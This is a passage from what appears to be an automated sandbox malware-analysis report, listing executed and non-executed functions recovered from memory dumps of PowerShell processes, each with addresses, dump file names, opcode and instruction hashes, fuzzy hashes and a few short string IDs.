                                                          • Opcode Fuzzy Hash: 753b684a66f22eaf6f9ee95e22c6ec4cd57ce55badf2f95d2d92285f8c4b788d
                                                          • Instruction Fuzzy Hash: 1A411B71A0DB8C4FDB589F5C981A6B8BBE1FB95311F00422FE449C3292DA70B9158BC2
                                                          Function 00007FFD9B7D9FF4 Relevance: .1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1745674260.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 041bd63293d93ec93d8f21f272938e386cba1b6ba29f8cee5f58e7fc525f2f8e
                                                          • Instruction ID: 9dc5f0e1646f08ef0ba69786b590c364e6207282895445fc2c4e4ea3be48dfd6
                                                          • Opcode Fuzzy Hash: 041bd63293d93ec93d8f21f272938e386cba1b6ba29f8cee5f58e7fc525f2f8e
                                                          • Instruction Fuzzy Hash: 7A413E77F0A79A0FD311DBACA8754E53BA0EF5136570942B7D18986073FE18154A8781
                                                          Function 00007FFD9B6BE620 Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1745256400.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b6bd000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a5a52525f1ccc025220c03837730cdc684b0598afbd3b3d813829594e57ed6d
                                                          • Instruction ID: 1c39f15f4e5c555aa867b6e36b58c882e9cc241e17e9fbf9ede8286585ef6e05
                                                          • Opcode Fuzzy Hash: 2a5a52525f1ccc025220c03837730cdc684b0598afbd3b3d813829594e57ed6d
                                                          • Instruction Fuzzy Hash: BF41277140EBC44FE7A68B29D8559523FF0EF56320B1606EFD0C8CB1A3D625B846CB92
                                                          Function 00007FFD9B7DA47C Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1745674260.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a07baee851ba9ac68cc4e182dc2738ab31f781c7d72f53d6bde2a1300b20da10
                                                          • Instruction ID: b7f95ec39329d2d5e579c41705e6269b3afb2a8fce17c787469b59d0d3ba40bb
                                                          • Opcode Fuzzy Hash: a07baee851ba9ac68cc4e182dc2738ab31f781c7d72f53d6bde2a1300b20da10
                                                          • Instruction Fuzzy Hash: 4421283090DB4C4FDB59DBAC984A7E97FF0EB96321F04426FD049C3162DA74A41ACB91
                                                          Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1745674260.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                          • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                          • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                          Function 00007FFD9B8A414D Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1746006320.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 626bae229b1ac96fe4b1d457ead44e4f7f0f87adf08fd81874a652e2345d356c
                                                          • Instruction ID: 17b1104fae090e621572f0d75016c07dcecd11ea8fd1d22ab84fff8324266811
                                                          • Opcode Fuzzy Hash: 626bae229b1ac96fe4b1d457ead44e4f7f0f87adf08fd81874a652e2345d356c
                                                          • Instruction Fuzzy Hash: C9F09A32B0E5098FDB68EB4CE4518A877E0EF5932071600BAE06DC71B3CA25EC408790
                                                          Function 00007FFD9B8A4400 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1746006320.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f79d10961b99d142bcddb17df9f177fecb69bcb51716edbddbcf320f68a5da64
                                                          • Instruction ID: 01296630a2b91dd0f0b0dda1df976d5b654e509d2aee648bb0635ac88e382f61
                                                          • Opcode Fuzzy Hash: f79d10961b99d142bcddb17df9f177fecb69bcb51716edbddbcf320f68a5da64
                                                          • Instruction Fuzzy Hash: B9F05E32A0F5498FDB64EB5CE4618A877E0FF4932475600BAE16DCB4A3DA29BC40C790
                                                          Function 00007FFD9B8A41D1 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1746006320.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                          • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                          • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90

                                                          Non-executed Functions

                                                          Function 00007FFD9B7D8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1745674260.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                          • API String ID: 0-3508309026
                                                          • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                          • Instruction ID: 33318d810732aedc5b8d73b2cd603b97cdeee6fc6f3f35bf73613f10f45d9dd5
                                                          • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                          • Instruction Fuzzy Hash: 3821497BB080654ED305BBBCBC289DD3750DFD423935642F2D2A9CB183EC14708A86C1

                                                          Executed Functions

                                                          Function 00007FFD9B80644D Relevance: .7, Instructions: 718COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1834708500.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e02ca464ea7ae6de21d61a294f11e71a5686d504ea3fd24b06289f8e9f2e65a4
                                                          • Instruction ID: 037ac1ab26722afa81261195cb9ffc3c99e142d309db7c23176f4f59250f5e45
                                                          • Opcode Fuzzy Hash: e02ca464ea7ae6de21d61a294f11e71a5686d504ea3fd24b06289f8e9f2e65a4
                                                          • Instruction Fuzzy Hash: 3DD19070A08A4D8FDF98DF58C465AED7BE1FF68340F15416AD44DD72A6CA34E841CB80
                                                          Function 00007FFD9B8D6605 Relevance: .4, Instructions: 438COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1835509999.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f393424dbfe2ca7abe34584db32630f2f3d64ce259d82f821a6fefd0277a2f6e
                                                          • Instruction ID: 044249981942fcac1971b1b77302c64155c2f81602cab89be1aa53899d64b990
                                                          • Opcode Fuzzy Hash: f393424dbfe2ca7abe34584db32630f2f3d64ce259d82f821a6fefd0277a2f6e
                                                          • Instruction Fuzzy Hash: 2DD136B2B0FACE4FEB659B6888655B57BA0EF99214B0903FFD45CC70E3D918A905C341
                                                          Function 00007FFD9B6EF345 Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1834096037.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b6ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85c9bcac7433be8ebe24e3d0e420b769ac89eeaf89d3588191fc29c6abf549bd
                                                          • Instruction ID: 0739e0cb78462e4037f191eba4c817267d45167b57e48c021673031df327516c
                                                          • Opcode Fuzzy Hash: 85c9bcac7433be8ebe24e3d0e420b769ac89eeaf89d3588191fc29c6abf549bd
                                                          • Instruction Fuzzy Hash: F241457250EBC44FE7669B3D98518523FF0EF56320B1A05EFD098CB0A3C624B84AC792
                                                          Function 00007FFD9B80A49C Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1834708500.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c81c0a3cd6280d47d0f2ee56738826611609ba9649a0a3e1c614bba9525355a
                                                          • Instruction ID: c31fb746bfdac6e8ffd94f604cb5326f546a7ec9b00f6749880c2bc045d617d5
                                                          • Opcode Fuzzy Hash: 9c81c0a3cd6280d47d0f2ee56738826611609ba9649a0a3e1c614bba9525355a
                                                          • Instruction Fuzzy Hash: 2C21E93190CB4C4FEB59DBAC984A6E97BE0EB96321F04416BD049C3162D674A45ACB91
                                                          Function 00007FFD9B8033B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1834708500.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                          • Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                          • Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41
                                                          Function 00007FFD9B8D414D Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1835509999.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bbd739304f2adb21c75fc5ca23a0ce01a59ad6a1bc9a1afe1851de3855821f82
                                                          • Instruction ID: 35d88a4e07d1e94e17ec44fd99c2e40dac8263d1b54528619819a4c72affd21e
                                                          • Opcode Fuzzy Hash: bbd739304f2adb21c75fc5ca23a0ce01a59ad6a1bc9a1afe1851de3855821f82
                                                          • Instruction Fuzzy Hash: EBF09032B0D5094FDB68EB4CE45189473E0EF5932071501BBE06DC71B3CA25EC408740
                                                          Function 00007FFD9B8D4400 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1835509999.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f165ff80040a414cfa96e0a919bfb6f8236be3ae13e78658e6b7978e9c09b5cd
                                                          • Instruction ID: 273a93717a68e959e13f094b4fbbe92c575fabde60f8a7531c749842e7a187bc
                                                          • Opcode Fuzzy Hash: f165ff80040a414cfa96e0a919bfb6f8236be3ae13e78658e6b7978e9c09b5cd
                                                          • Instruction Fuzzy Hash: DAF0BE32A0E5498FDB64EB4CE0648A873E0FF4932070601BBE05DCB0A3DA25BC80C780
                                                          Function 00007FFD9B8D41D1 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1835509999.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                          • Instruction ID: 7088ed3d6d6b9d5ea87a478394cc45f134a04600c237e2e00915a735f27c0c4b
                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                          • Instruction Fuzzy Hash: 07E01A31B0C8089FDB78DB4CE0519A973E1EB98331B1602BBD14EC7571CA22ED518B80

                                                          Non-executed Functions

                                                          Function 00007FFD9B808BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1834708500.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
                                                          • API String ID: 0-4293504607
                                                          • Opcode ID: 16609c71894029b894e31eb0b6bb0f1b244423be56d9ce1e11d0e6353f0d3301
                                                          • Instruction ID: 39debd1757804db3e97563aba3e1b84bbce0da434c3ed87857006a438589be37
                                                          • Opcode Fuzzy Hash: 16609c71894029b894e31eb0b6bb0f1b244423be56d9ce1e11d0e6353f0d3301
                                                          • Instruction Fuzzy Hash: 6831137BB0952A1ED715B6BCB8A55EC67A0DFD437A35683F7D198CB093CC2460CB8680
                                                          Function 00007FFD9B8089F2 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1834708500.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K_^$K_^$K_^$K_^$K_^
                                                          • API String ID: 0-4077390204
                                                          • Opcode ID: 39280c11405113c3a4d2d16cebceb6f112e29f5502a8d519c6e21b6a78800a7c
                                                          • Instruction ID: ec30e71d5c547b23bdb31f6cbf41ca2c868668e4b1760266469aa0d90de5f175
                                                          • Opcode Fuzzy Hash: 39280c11405113c3a4d2d16cebceb6f112e29f5502a8d519c6e21b6a78800a7c
                                                          • Instruction Fuzzy Hash: 5531A6A3B0F5C61FFB6A476948654D57FA0FF6579830A43F6C0D48A4A3EC0469835252

                                                          Executed Functions

                                                          Function 00007FFD9B8C3A17 Relevance: 2.8, Strings: 1, Instructions: 1551COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1995380292.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: J_H
                                                          • API String ID: 0-326533465
                                                          • Opcode ID: a5343b4245e30afcbcefdbc1859713bdd272c3dd4135899f3f4993bfcf06e9e3
                                                          • Instruction ID: 31da46367cd0c155505a0133ee19209f1c4e82e20867be4301788abc7ade4bee
                                                          • Opcode Fuzzy Hash: a5343b4245e30afcbcefdbc1859713bdd272c3dd4135899f3f4993bfcf06e9e3
                                                          • Instruction Fuzzy Hash: EEA23F62B0F78A0FE7A6AB6858655B47BE1EF5A210B0A01FFD04DC71E3DD18AC46C351
                                                          Function 00007FFD9B8C6605 Relevance: .4, Instructions: 448COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1995380292.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0eb96924484e2b054c7cd30079cb24f31cbc151ab60187da31dedc6ddb4f409
                                                          • Instruction ID: ec5ab137e6da40fa0700b7802e86cee7dd657fe3f56a1a2729b45848051387e0
                                                          • Opcode Fuzzy Hash: e0eb96924484e2b054c7cd30079cb24f31cbc151ab60187da31dedc6ddb4f409
                                                          • Instruction Fuzzy Hash: 12D137B2B0FA8E4FEB65AB6888645B57BE0EF69314B1901FFD44CC70E3D918A905C341
                                                          Function 00007FFD9B7F9F7C Relevance: .2, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1994579199.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bbb14f992ac5cb8c29eedb94a2ea35dccb368b9385aa3d49a48f2b3129b4ad4
                                                          • Instruction ID: 3d41ae84ddaaedc45f831c4ecab9f843b4f2c36e59b86a35e3537cbd0d7a4e18
                                                          • Opcode Fuzzy Hash: 3bbb14f992ac5cb8c29eedb94a2ea35dccb368b9385aa3d49a48f2b3129b4ad4
                                                          • Instruction Fuzzy Hash: 96518F27F0ABCD0BD711EBADA8760E93BB0EF51729B0942B3C4D84A073FD15155A86C6
                                                          Function 00007FFD9B7F9738 Relevance: .1, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1994579199.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 98678438099f0b4e69635b82be4987aca50ce9785d9945f4cd95312e60ec768a
                                                          • Instruction ID: 6b50383638cafe896fbc4946c381853d6c4b88f2bab920f792f709ab48b61eaa
                                                          • Opcode Fuzzy Hash: 98678438099f0b4e69635b82be4987aca50ce9785d9945f4cd95312e60ec768a
                                                          • Instruction Fuzzy Hash: 13411A71A0DB884FDF689F5C981A6B87BE0FB95310F40422FE048932A2DA20E915C7C6
                                                          Function 00007FFD9B6DEE20 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1993708546.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b6dd000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70f2208209a98e2a390c6e0db3b9a4065cea5fbaff521b41f066cb714f4e9cc1
                                                          • Instruction ID: 5500cde9f9fe0718efb259f4078f883bb8c93afb22bf2badb3e2a1e815b40b4e
                                                          • Opcode Fuzzy Hash: 70f2208209a98e2a390c6e0db3b9a4065cea5fbaff521b41f066cb714f4e9cc1
                                                          • Instruction Fuzzy Hash: 2141057140EBC85FE7668B399C519523FF0EF92320B1606DFD088CB1A3D625A846C7A2
                                                          Function 00007FFD9B7FA47C Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1994579199.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2afdf04741ead9196f0b93b0894ec42e168a5c1d1794a03fad32ffc0a314554a
                                                          • Instruction ID: a535133981a1fb44f190104e86ea3a5fe4ede9dc99cc897a0ad12e2fc608ed3b
                                                          • Opcode Fuzzy Hash: 2afdf04741ead9196f0b93b0894ec42e168a5c1d1794a03fad32ffc0a314554a
                                                          • Instruction Fuzzy Hash: 22212830A0CB4C8FDB59DBAC984A7E97FF0EB96321F04426FD048C3162DA749416CB92
                                                          Function 00007FFD9B8C40BF Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1995380292.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f06416454ce380a8acdc2503bde248e5c33476518dcf134394a6d2a41b756113
                                                          • Instruction ID: 98d388151e72eb9dd78a7e203c0178feacf3c146e6d1b1846044aaf67c911dea
                                                          • Opcode Fuzzy Hash: f06416454ce380a8acdc2503bde248e5c33476518dcf134394a6d2a41b756113
                                                          • Instruction Fuzzy Hash: 2721C0A2B0F98A4FE7B5AB58446257466D1EF68210B4E10BFD09EC75E2CE18EC818301
                                                          Function 00007FFD9B8C43BC Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1995380292.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b35ed56c6ccb8da0981d0bf47d296e83808c213bc20cfb0fa4938b3ae893b641
                                                          • Instruction ID: 7368179d44ee42d6f1907b7980d7bb24a75a8acadfa6434423843613e13e33b0
                                                          • Opcode Fuzzy Hash: b35ed56c6ccb8da0981d0bf47d296e83808c213bc20cfb0fa4938b3ae893b641
                                                          • Instruction Fuzzy Hash: 7411E0B2B0F5494FE7B4E76890709B876D0EF88320B5A00BBE01DC75A2DA19AD808340
                                                          Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1994579199.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45

                                                          Non-executed Functions

                                                          Function 00007FFD9B7F8995 Relevance: 5.1, Strings: 4, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1994579199.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L_^$L_^$L_^$L_^
                                                          • API String ID: 0-2357752022
                                                          • Opcode ID: 28971c99d7fb50a35fe3b64fc73d632a012368532ca00f6b034fdeaf7473e2af
                                                          • Instruction ID: 2af2530efbdc43c6e44cd736ec6f29a7adadae2fa120769d398be1f3ab90738b
                                                          • Opcode Fuzzy Hash: 28971c99d7fb50a35fe3b64fc73d632a012368532ca00f6b034fdeaf7473e2af
                                                          • Instruction Fuzzy Hash: 3A41C363B0F7C65FE366876949750997FA0EF12324B0E53F7C1D48B0B3ED18250A4286
                                                          Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1994579199.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L_^4$L_^7$L_^F$L_^J
                                                          • API String ID: 0-3225005683
                                                          • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                          • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                                          • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                          • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

                                                          Executed Functions

                                                          Function 00007FFD9B80644D Relevance: .7, Instructions: 718COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30f1cdfe22c9a1394c5a22fa797d194e06f1072b019d76192ba922380c632ef7
